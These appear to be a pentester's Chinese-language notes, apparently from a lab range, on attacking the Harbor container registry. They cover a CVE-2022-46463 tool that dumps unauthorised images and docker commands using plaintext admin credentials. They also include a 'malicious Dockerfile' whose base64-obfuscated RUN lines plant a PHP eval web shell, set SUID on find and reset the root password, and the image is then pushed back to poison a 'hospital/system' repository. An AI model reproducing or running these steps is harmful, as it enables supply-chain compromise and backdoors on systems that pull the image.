Harbor

created: 2026-01-27 13:10
tags:
  - Harbor
  - Docker
aliases:
  - Harbor未授权访问
  - 推送恶意镜像到harbor
Type:
title:
updated: 2026-01-27 13:10

Harbor 是一个开源的云原生制品仓库（Cloud Native Repository），主要用于存储和管理 Docker 镜像、Helm Charts 等容器相关制品
https://github.com/goharbor/harbor
Pasted image 20260120223020.png

1. Harbor未授权访问

https://github.com/404tk/CVE-2022-46463

git clone https://github.com/404tk/CVE-2022-46463

#检测未授权访问的公共镜像
┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet/CVE-2022-46463]
└─# python harbor.py http://172.22.14.46/
[*] API version used v2.0
[+] project/projectadmin
[+] project/portal


#下载镜像
┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet/CVE-2022-46463]
└─# python harbor.py http://172.22.14.46/ --dump harbor/secret --v2

也可以用docker来拉镜像

#（非必需）添加docker代理 /etc/systemd/system/docker.service.d/http-proxy.conf
[Service]
Environment="HTTP_PROXY=socks5://124.71.111.64/1188"

#docker login (拉私有镜像需要)
docker login 172.22.18.64 -u admin -p password@nk9DLwqce

#修改/etc/docker/daemon.json
"insecure-registries": ["172.22.18.64"] 

#重启docker
systemctl daemon-reload
systemctl restart docker

#拉取镜像
docker pull 172.22.18.64/public/mysql:5.6

#运行镜像
docker run -itd 172.22.18.64/public/mysql:5.6

2. 推送恶意镜像到harbor

#docker login
docker login 172.22.18.64 -u admin -p password@nk9DLwqce

#修改/etc/docker/daemon.json
"insecure-registries": ["172.22.18.64"]

编写恶意dockerfile

FROM 172.22.18.64/hospital/system@sha256:8a280a0432a365e1cd830e84961a7dda9faf11b5fde2fe79edb9a99b581e793b

RUN echo "ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+JyA+IC92YXIvd3d3L2h0bWwvc2hlbGwucGhwICYmIGNobW9kIHUrcyAvdXNyL2Jpbi9maW5k" | base64 -d | bash && \
    echo "ZWNobyAicm9vdDpwYXNzd29yZCIgfCBjaHBhc3N3ZA==" | base64 -d | bash

ENTRYPOINT ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"]

#构建恶意镜像
docker build -t 172.22.18.64/hospital/system .

#推送恶意镜像
docker push 172.22.18.64/hospital/system